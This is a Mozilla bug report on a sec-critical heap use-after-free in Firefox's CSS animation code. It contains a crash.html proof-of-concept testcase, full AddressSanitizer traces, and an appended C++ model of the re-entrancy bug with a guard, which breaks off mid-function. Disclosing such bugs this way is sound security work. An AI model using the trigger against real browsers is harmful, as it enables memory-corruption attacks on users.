Closed Bug 1317500 Opened 8 years ago Closed 8 years ago

heap-use-after-free in mozilla::dom::KeyframeEffectReadOnly::CalculateCumulativeChangeHint

Categories: Core :: DOM: Animation (defect)
Type: defect
Priority: Not set
Severity: normal

Tracking: RESOLVED DUPLICATE of bug 1289701
Tracking Status: firefox53 --- affected

People: Reporter: nils, Unassigned

Details: Keywords: csectype-uaf, reporter-external, sec-critical

The following testcase crashes the latest ASAN build of Firefox (BuildID=20161113140512).

crash.html:

<script>
function start() {
  o1=document.documentElement;
  o10=document.createElement('area');
  o104=document.createElement('spacer');
  o121=document.createElement('tr');
  o143=document.createElement('track');
  o216=document.createRange();
  o337=document.createElement('dialog');
  o337.innerHTML="<svg x><style>";
  o346=o337.querySelectorAll('*')[1];
  o121.innerHTML="<style>@font-face{ font-family: font7; src: url() format('eot')}.class2{}\n*{ font-size: 85rem!important; all: initial;>";
  o10.appendChild(o1);
  o216.surroundContents(o143);
  document.documentElement.appendChild(o121);
  document.documentElement.appendChild(o104);
  o104.innerHTML="<svg><style>@keyframes{{}}*{ animation-name: key12; animation-duration: 0.001s;}{}\n@keyframes key12{ from{ font: larger Helvetica";
  o216.surroundContents(o346);
}
</script>
<body onload="start()"></body>

ASAN output:

=================================================================
==8716==ERROR: AddressSanitizer: heap-use-after-free on address 0x615000340db8 at pc 0x7fdbe2711e96 bp 0x7ffcb9317ad0 sp 0x7ffcb9317ac8
READ of size 4 at 0x615000340db8 thread T0 (Web Content)
    #0 0x7fdbe2711e95 in mozilla::dom::KeyframeEffectReadOnly::CalculateCumulativeChangeHint(nsStyleContext*) /home/worker/workspace/build/src/dom/animation/KeyframeEffectReadOnly.cpp:1262:54
    #1 0x7fdbe2700f54 in mozilla::dom::KeyframeEffectReadOnly::UpdateProperties(nsStyleContext*) /home/worker/workspace/build/src/dom/animation/KeyframeEffectReadOnly.cpp:333:5
    #2 0x7fdbe27005ab in mozilla::EffectCompositor::UpdateEffectProperties(nsStyleContext*, mozilla::dom::Element*, mozilla::CSSPseudoElementType) /home/worker/workspace/build/src/dom/animation/EffectCompositor.cpp:274:5
    #3 0x7fdbe6a69d26 in nsStyleSet::GetContext(nsStyleContext*, nsRuleNode*, nsRuleNode*, nsIAtom*, mozilla::CSSPseudoElementType, mozilla::dom::Element*, unsigned int) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:976:7
    #4 0x7fdbe6a6ea03 in nsStyleSet::ResolveStyleFor(mozilla::dom::Element*, nsStyleContext*, TreeMatchContext&) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:1392:10
    #5 0x7fdbe6ba6a9e in mozilla::ElementRestyler::RestyleUndisplayedNodes(nsRestyleHint, mozilla::UndisplayedNode*, nsIContent*, nsStyleContext*, mozilla::StyleDisplay) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:3483:9
    #6 0x7fdbe6ba0aa8 in DoRestyleUndisplayedDescendants /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:3428:3
    #7 0x7fdbe6ba0aa8 in mozilla::ElementRestyler::RestyleUndisplayedDescendants(nsRestyleHint) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:3414
    #8 0x7fdbe6b9f8db in mozilla::ElementRestyler::RestyleChildren(nsRestyleHint) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:3221:3
    #9 0x7fdbe6b988ce in mozilla::ElementRestyler::Restyle(nsRestyleHint) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:2294:5
    #10 0x7fdbe6ba26bc in mozilla::ElementRestyler::RestyleContentChildren(nsIFrame*, nsRestyleHint) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:3729:13
    #11 0x7fdbe6b9f9ad in mozilla::ElementRestyler::RestyleChildren(nsRestyleHint) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:3251:7
    #12 0x7fdbe6b988ce in mozilla::ElementRestyler::Restyle(nsRestyleHint) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:2294:5
    #13 0x7fdbe6ba26bc in mozilla::ElementRestyler::RestyleContentChildren(nsIFrame*, nsRestyleHint) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:3729:13
    #14 0x7fdbe6b9f9ad in mozilla::ElementRestyler::RestyleChildren(nsRestyleHint) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:3251:7
    #15 0x7fdbe6b988ce in mozilla::ElementRestyler::Restyle(nsRestyleHint) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:2294:5
    #16 0x7fdbe6ba5184 in mozilla::ElementRestyler::ComputeStyleChangeFor(nsIFrame*, nsStyleChangeList*, nsChangeHint, mozilla::RestyleTracker&, nsRestyleHint, mozilla::RestyleHintData const&, nsTArray<mozilla::ElementRestyler::ContextToClear>&, nsTArray<RefPtr<nsStyleContext> >&) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:3393:7
    #17 0x7fdbe6b8a7f4 in mozilla::RestyleManager::ComputeAndProcessStyleChange(nsIFrame*, nsChangeHint, mozilla::RestyleTracker&, nsRestyleHint, mozilla::RestyleHintData const&) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:3803:3
    #18 0x7fdbe6b894d1 in mozilla::RestyleManager::StartRebuildAllStyleData(mozilla::RestyleTracker&) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:764:3
    #19 0x7fdbe6bade56 in BeginProcessingRestyles /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:871:5
    #20 0x7fdbe6bade56 in mozilla::RestyleTracker::DoProcessRestyles() /home/worker/workspace/build/src/layout/base/RestyleTracker.cpp:154
    #21 0x7fdbe6b91474 in ProcessRestyles /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RestyleManager.h:490:7
    #22 0x7fdbe6b91474 in mozilla::RestyleManager::ProcessPendingRestyles() /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:834
    #23 0x7fdbe6dcd36f in ProcessPendingRestyles /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RestyleManagerHandleInlines.h:74:3
    #24 0x7fdbe6dcd36f in PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:4135
    #25 0x7fdbe6ae8be1 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1836:11
    #26 0x7fdbe6af5230 in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray<RefPtr<nsRefreshDriver> >&) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:295:7
    #27 0x7fdbe6af4eb8 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:317:5
    #28 0x7fdbe6af6dd4 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:501:9
    #29 0x7fdbe7469124 in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&) /home/worker/workspace/build/src/layout/ipc/VsyncChild.cpp:64:5
    #30 0x7fdbe1199def in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PVsyncChild.cpp:233:20
    #31 0x7fdbe0cb8613 in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundChild.cpp:1571:16
    #32 0x7fdbe0bf4555 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1730:14
    #33 0x7fdbe0bf0a7c in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&&) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1668:17
    #34 0x7fdbe0bf31e4 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1569:5
    #35 0x7fdbe0bf36ee in mozilla::ipc::MessageChannel::MessageTask::Run() /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1592:5
    #36 0x7fdbdfe2cc4b in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1175:7
    #37 0x7fdbdfead1bc in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/glue/nsThreadUtils.cpp:361:10
    #38 0x7fdbe0bfba1f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #39 0x7fdbe0b6e858 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:232:3
    #40 0x7fdbe0b6e858 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:225
    #41 0x7fdbe0b6e858 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:205
    #42 0x7fdbe643edaf in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
    #43 0x7fdbe85b95a7 in XRE_RunAppShell /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:869:12
    #44 0x7fdbe0b6e858 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:232:3
    #45 0x7fdbe0b6e858 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:225
    #46 0x7fdbe0b6e858 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:205
    #47 0x7fdbe85b8ae3 in XRE_InitChildProcess /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:701:7
    #48 0x4dfb2b in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:197:19
    #49 0x4dfb2b in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:392
    #50 0x7fdbfb26782f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291
    #51 0x41ba08 in _start (/home/nils/MonkeyFarm/firefox/firefox+0x41ba08)

0x615000340db8 is located 56 bytes inside of 512-byte region [0x615000340d80,0x615000340f80)
freed by thread T0 (Web Content) here:
    #0 0x4b215b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:38:3
    #1 0x7fdbdfc3f8e1 in Free /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:197:34
    #2 0x7fdbdfc3f8e1 in nsTArray_base<nsTArrayInfallibleAllocator, nsTArray_CopyWithMemutils>::ShrinkCapacity(unsigned long, unsigned long) /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray-inl.h:230
    #3 0x7fdbe2700e52 in Clear /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:1635:18
    #4 0x7fdbe2700e52 in operator= /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:943
    #5 0x7fdbe2700e52 in operator= /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:2146
    #6 0x7fdbe2700e52 in mozilla::dom::KeyframeEffectReadOnly::UpdateProperties(nsStyleContext*) /home/worker/workspace/build/src/dom/animation/KeyframeEffectReadOnly.cpp:324
    #7 0x7fdbe2710e68 in mozilla::dom::KeyframeEffectReadOnly::SetKeyframes(nsTArray<mozilla::Keyframe>&&, nsStyleContext*) /home/worker/workspace/build/src/dom/animation/KeyframeEffectReadOnly.cpp:207:5
    #8 0x7fdbe684ed69 in UpdateOldAnimationPropertiesWithNew /home/worker/workspace/build/src/layout/style/nsAnimationManager.cpp:337:7
    #9 0x7fdbe684ed69 in CSSAnimationBuilder::Build(nsPresContext*, mozilla::StyleAnimation const&, nsCSSKeyframesRule const*) /home/worker/workspace/build/src/layout/style/nsAnimationManager.cpp:610
    #10 0x7fdbe684d7f6 in nsAnimationManager::BuildAnimations(nsStyleContext*, mozilla::dom::Element*, mozilla::AnimationCollection<mozilla::dom::CSSAnimation>*, nsTArray<RefPtr<mozilla::dom::CSSAnimation> >&) /home/worker/workspace/build/src/layout/style/nsAnimationManager.cpp:1077:33
    #11 0x7fdbe684cd55 in nsAnimationManager::UpdateAnimations(nsStyleContext*, mozilla::dom::Element*) /home/worker/workspace/build/src/layout/style/nsAnimationManager.cpp:400:5
    #12 0x7fdbe6a69ca8 in nsStyleSet::GetContext(nsStyleContext*, nsRuleNode*, nsRuleNode*, nsIAtom*, mozilla::CSSPseudoElementType, mozilla::dom::Element*, unsigned int) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:974:7
    #13 0x7fdbe6a6ea03 in nsStyleSet::ResolveStyleFor(mozilla::dom::Element*, nsStyleContext*, TreeMatchContext&) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:1392:10
    #14 0x7fdbe6a6e239 in nsStyleSet::ResolveStyleFor(mozilla::dom::Element*, nsStyleContext*) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:1350:10
    #15 0x7fdbe69ca76d in ResolveStyleFor /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/StyleSetHandleInlines.h:84:3
    #16 0x7fdbe69ca76d in CalcLengthWith(nsCSSValue const&, int, nsStyleFont const*, nsStyleContext*, nsPresContext*, bool, bool, mozilla::RuleNodeCacheConditions&) /home/worker/workspace/build/src/layout/style/nsRuleNode.cpp:570
    #17 0x7fdbe6ad1581 in SetFontSizeCalcOps::ComputeLeafValue(nsCSSValue const&) /home/worker/workspace/build/src/layout/style/nsRuleNode.cpp:3346:14
    #18 0x7fdbe6a2bc76 in nsRuleNode::SetFontSize(nsPresContext*, nsRuleData const*, nsStyleFont const*, nsStyleFont const*, int*, nsFont const&, int, int, bool, bool, mozilla::RuleNodeCacheConditions&) /home/worker/workspace/build/src/layout/style/nsRuleNode.cpp:3440:14
    #19 0x7fdbe6a312f5 in nsRuleNode::SetFont(nsPresContext*, nsStyleContext*, unsigned char, nsRuleData const*, nsStyleFont const*, nsStyleFont*, bool, mozilla::RuleNodeCacheConditions&) /home/worker/workspace/build/src/layout/style/nsRuleNode.cpp:4026:3
    #20 0x7fdbe69d56f0 in nsRuleNode::ComputeFontData(void*, nsRuleData const*, nsStyleContext*, nsRuleNode*, nsRuleNode::RuleDetail, mozilla::RuleNodeCacheConditions) /home/worker/workspace/build/src/layout/style/nsRuleNode.cpp:4285:5
    #21 0x7fdbe69cfdb1 in nsRuleNode::WalkRuleTree(nsStyleStructID, nsStyleContext*) /home/worker/workspace/build/src/layout/style/nsRuleNode.cpp:2622:10
    #22 0x7fdbe69d0811 in nsStyleContext::StyleData(nsStyleStructID) /home/worker/workspace/build/src/layout/style/nsStyleContext.cpp:468:15
    #23 0x7fdbe2717bc7 in mozilla::dom::CreateStyleContextForAnimationValue(nsCSSPropertyID, mozilla::StyleAnimationValue const&, nsStyleContext*) /home/worker/workspace/build/src/dom/animation/KeyframeEffectReadOnly.cpp:1244:3
    #24 0x7fdbe2711b16 in mozilla::dom::KeyframeEffectReadOnly::CalculateCumulativeChangeHint(nsStyleContext*) /home/worker/workspace/build/src/dom/animation/KeyframeEffectReadOnly.cpp:1258:9
    #25 0x7fdbe2700f54 in mozilla::dom::KeyframeEffectReadOnly::UpdateProperties(nsStyleContext*) /home/worker/workspace/build/src/dom/animation/KeyframeEffectReadOnly.cpp:333:5
    #26 0x7fdbe27005ab in mozilla::EffectCompositor::UpdateEffectProperties(nsStyleContext*, mozilla::dom::Element*, mozilla::CSSPseudoElementType) /home/worker/workspace/build/src/dom/animation/EffectCompositor.cpp:274:5
    #27 0x7fdbe6a69d26 in nsStyleSet::GetContext(nsStyleContext*, nsRuleNode*, nsRuleNode*, nsIAtom*, mozilla::CSSPseudoElementType, mozilla::dom::Element*, unsigned int) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:976:7
    #28 0x7fdbe6a6ea03 in nsStyleSet::ResolveStyleFor(mozilla::dom::Element*, nsStyleContext*, TreeMatchContext&) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:1392:10
    #29 0x7fdbe6ba6a9e in mozilla::ElementRestyler::RestyleUndisplayedNodes(nsRestyleHint, mozilla::UndisplayedNode*, nsIContent*, nsStyleContext*, mozilla::StyleDisplay) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:3483:9
    #30 0x7fdbe6ba0aa8 in DoRestyleUndisplayedDescendants /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:3428:3
    #31 0x7fdbe6ba0aa8 in mozilla::ElementRestyler::RestyleUndisplayedDescendants(nsRestyleHint) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:3414
    #32 0x7fdbe6b9f8db in mozilla::ElementRestyler::RestyleChildren(nsRestyleHint) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:3221:3
    #33 0x7fdbe6b988ce in mozilla::ElementRestyler::Restyle(nsRestyleHint) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:2294:5
    #34 0x7fdbe6ba26bc in mozilla::ElementRestyler::RestyleContentChildren(nsIFrame*, nsRestyleHint) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:3729:13
    #35 0x7fdbe6b9f9ad in mozilla::ElementRestyler::RestyleChildren(nsRestyleHint) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:3251:7
    #36 0x7fdbe6b988ce in mozilla::ElementRestyler::Restyle(nsRestyleHint) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:2294:5

previously allocated by thread T0 (Web Content) here:
    #0 0x4b27ce in realloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:71:3
    #1 0x4e0f1d in moz_xrealloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:105:20
    #2 0x7fdbdfc3fee1 in Realloc /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:209:12
    #3 0x7fdbdfc3fee1 in nsTArrayInfallibleAllocator::ResultTypeProxy nsTArray_base<nsTArrayInfallibleAllocator, nsTArray_CopyWithMemutils>::EnsureCapacity<nsTArrayInfallibleAllocator>(unsigned long, unsigned long) /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray-inl.h:183
    #4 0x7fdbe27278db in AppendElements<nsTArrayInfallibleAllocator> /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:1588:34
    #5 0x7fdbe27278db in AppendElement<nsTArrayInfallibleAllocator> /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:1616
    #6 0x7fdbe27278db in BuildSegmentsFromValueEntries /home/worker/workspace/build/src/dom/animation/KeyframeUtils.cpp:1259
    #7 0x7fdbe27278db in mozilla::KeyframeUtils::GetAnimationPropertiesFromKeyframes(nsTArray<mozilla::Keyframe> const&, nsTArray<nsTArray<mozilla::PropertyStyleAnimationValuePair> > const&, nsStyleContext*) /home/worker/workspace/build/src/dom/animation/KeyframeUtils.cpp:694
    #8 0x7fdbe2700b5e in mozilla::dom::KeyframeEffectReadOnly::UpdateProperties(nsStyleContext*) /home/worker/workspace/build/src/dom/animation/KeyframeEffectReadOnly.cpp:298:7
    #9 0x7fdbe27005ab in mozilla::EffectCompositor::UpdateEffectProperties(nsStyleContext*, mozilla::dom::Element*, mozilla::CSSPseudoElementType) /home/worker/workspace/build/src/dom/animation/EffectCompositor.cpp:274:5
    #10 0x7fdbe6a69d26 in nsStyleSet::GetContext(nsStyleContext*, nsRuleNode*, nsRuleNode*, nsIAtom*, mozilla::CSSPseudoElementType, mozilla::dom::Element*, unsigned int) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:976:7
    #11 0x7fdbe6a6ea03 in nsStyleSet::ResolveStyleFor(mozilla::dom::Element*, nsStyleContext*, TreeMatchContext&) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:1392:10
    #12 0x7fdbe6ba6a9e in mozilla::ElementRestyler::RestyleUndisplayedNodes(nsRestyleHint, mozilla::UndisplayedNode*, nsIContent*, nsStyleContext*, mozilla::StyleDisplay) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:3483:9
    #13 0x7fdbe6ba0aa8 in DoRestyleUndisplayedDescendants /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:3428:3
    #14 0x7fdbe6ba0aa8 in mozilla::ElementRestyler::RestyleUndisplayedDescendants(nsRestyleHint) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:3414
    #15 0x7fdbe6b9f8db in mozilla::ElementRestyler::RestyleChildren(nsRestyleHint) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:3221:3
    #16 0x7fdbe6b988ce in mozilla::ElementRestyler::Restyle(nsRestyleHint) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:2294:5
    #17 0x7fdbe6ba26bc in mozilla::ElementRestyler::RestyleContentChildren(nsIFrame*, nsRestyleHint) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:3729:13
    #18 0x7fdbe6b9f9ad in mozilla::ElementRestyler::RestyleChildren(nsRestyleHint) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:3251:7
    #19 0x7fdbe6b988ce in mozilla::ElementRestyler::Restyle(nsRestyleHint) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:2294:5
    #20 0x7fdbe6ba26bc in mozilla::ElementRestyler::RestyleContentChildren(nsIFrame*, nsRestyleHint) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:3729:13
    #21 0x7fdbe6b9f9ad in mozilla::ElementRestyler::RestyleChildren(nsRestyleHint) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:3251:7
    #22 0x7fdbe6b988ce in mozilla::ElementRestyler::Restyle(nsRestyleHint) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:2294:5
    #23 0x7fdbe6ba5184 in mozilla::ElementRestyler::ComputeStyleChangeFor(nsIFrame*, nsStyleChangeList*, nsChangeHint, mozilla::RestyleTracker&, nsRestyleHint, mozilla::RestyleHintData const&, nsTArray<mozilla::ElementRestyler::ContextToClear>&, nsTArray<RefPtr<nsStyleContext> >&) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:3393:7
    #24 0x7fdbe6b8a7f4 in mozilla::RestyleManager::ComputeAndProcessStyleChange(nsIFrame*, nsChangeHint, mozilla::RestyleTracker&, nsRestyleHint, mozilla::RestyleHintData const&) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:3803:3
    #25 0x7fdbe6b894d1 in mozilla::RestyleManager::StartRebuildAllStyleData(mozilla::RestyleTracker&) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:764:3
    #26 0x7fdbe6bade56 in BeginProcessingRestyles /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:871:5
    #27 0x7fdbe6bade56 in mozilla::RestyleTracker::DoProcessRestyles() /home/worker/workspace/build/src/layout/base/RestyleTracker.cpp:154
    #28 0x7fdbe6b91474 in ProcessRestyles /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RestyleManager.h:490:7
    #29 0x7fdbe6b91474 in mozilla::RestyleManager::ProcessPendingRestyles() /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:834
    #30 0x7fdbe6dcd36f in ProcessPendingRestyles /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RestyleManagerHandleInlines.h:74:3
    #31 0x7fdbe6dcd36f in PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:4135
    #32 0x7fdbe6ae8be1 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1836:11
    #33 0x7fdbe6af5230 in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray<RefPtr<nsRefreshDriver> >&) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:295:7
    #34 0x7fdbe6af4eb8 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:317:5
    #35 0x7fdbe6af6dd4 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:501:9
    #36 0x7fdbe7469124 in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&) /home/worker/workspace/build/src/layout/ipc/VsyncChild.cpp:64:5
    #37 0x7fdbe1199def in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PVsyncChild.cpp:233:20

SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/dom/animation/KeyframeEffectReadOnly.cpp:1262:54 in mozilla::dom::KeyframeEffectReadOnly::CalculateCumulativeChangeHint(nsStyleContext*)
Shadow bytes around the buggy address:
  0x0c2a80060160: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2a80060170: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2a80060180: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2a80060190: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2a800601a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c2a800601b0: fd fd fd fd fd fd fd[fd]fd fd fd fd fd fd fd fd
  0x0c2a800601c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2a800601d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2a800601e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2a800601f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c2a80060200: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==8716==ABORTING
Flags: needinfo?(bbirtles)
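The freed-by stack above shows the shape of the bug: UpdateProperties reassigns the properties array, then CalculateCumulativeChangeHint iterates it, and style resolution from inside that loop walks back through nsAnimationManager and SetKeyframes into a nested UpdateProperties, whose operator= frees the buffer the outer loop still reads. The C++ model below is an added illustration of that re-entrancy pattern and one defensive shape for it (a re-entrancy guard); it is not Firefox code and does not claim to be the fix from bug 1289701. EffectModel, Property, mResolveStyle and the sample values are constructed stand-ins.

```cpp
#include <cstdio>
#include <functional>
#include <utility>
#include <vector>

// Constructed stand-in for one animated property; the outer loop reads `value`.
struct Property { int id; int value; };

// Constructed stand-in for the effect. mProperties plays the nsTArray freed in
// the trace; mResolveStyle stands in for style resolution, which in the trace
// walks back into UpdateProperties via nsAnimationManager and SetKeyframes.
struct EffectModel {
  std::vector<Property> mProperties;
  std::function<void(EffectModel&)> mResolveStyle;
  bool mInUpdate = false;   // re-entrancy guard used by the hardened path
  int mDeferred = 0;        // nested updates the guard skipped
  int mResolveCalls = 0;

  // Unsafe shape: assign mProperties, then iterate it while calling out to
  // code that can re-enter and assign it again. Returns {true, partial hint}
  // if the buffer was replaced under the loop; the model stops there instead
  // of reading through the stale pointer as the real code did.
  std::pair<bool, int> UpdateUnsafe(std::vector<Property> fresh) {
    mProperties = std::move(fresh);              // old buffer freed here
    const Property* base = mProperties.data();
    int hint = 0;
    for (std::size_t i = 0; i < mProperties.size(); ++i) {
      if (mResolveStyle) mResolveStyle(*this);   // may re-enter UpdateUnsafe
      if (mProperties.data() != base) return {true, hint};  // base dangles now
      hint += base[i].value;
    }
    return {false, hint};
  }

  // Hardened shape: a nested update while one is in progress is counted and
  // skipped, so the buffer the outer loop indexes stays alive. (A complete
  // fix would also replay the deferred update afterwards; omitted here.)
  std::pair<bool, int> UpdateGuarded(std::vector<Property> fresh) {
    if (mInUpdate) { ++mDeferred; return {false, 0}; }
    mInUpdate = true;
    mProperties = std::move(fresh);
    const Property* base = mProperties.data();
    int hint = 0;
    for (std::size_t i = 0; i < mProperties.size(); ++i) {
      if (mResolveStyle) mResolveStyle(*this);
      if (mProperties.data() != base) { mInUpdate = false; return {true, hint}; }
      hint += mProperties[i].value;
    }
    mInUpdate = false;
    return {false, hint};
  }
};

// Re-enter exactly once, as the trace shows a single nested UpdateProperties.
static void ReenterOnce(EffectModel& m, bool guarded) {
  if (m.mResolveCalls++ != 0) return;
  std::vector<Property> again = {{1, 10}, {2, 20}, {3, 30}};  // constructed input
  if (guarded) m.UpdateGuarded(again); else m.UpdateUnsafe(again);
}

// true: the unsafe path had its buffer replaced while still iterating it.
bool UnsafePathReplacesBuffer() {
  EffectModel m;
  m.mResolveStyle = [](EffectModel& e) { ReenterOnce(e, false); };
  return m.UpdateUnsafe({{1, 1}, {2, 2}}).first;
}

// Hint over the stable buffer (1 + 2 = 3) with exactly one update deferred,
// or -1 if the guard did not hold.
int GuardedPathHint() {
  EffectModel m;
  m.mResolveStyle = [](EffectModel& e) { ReenterOnce(e, true); };
  auto r = m.UpdateGuarded({{1, 1}, {2, 2}});
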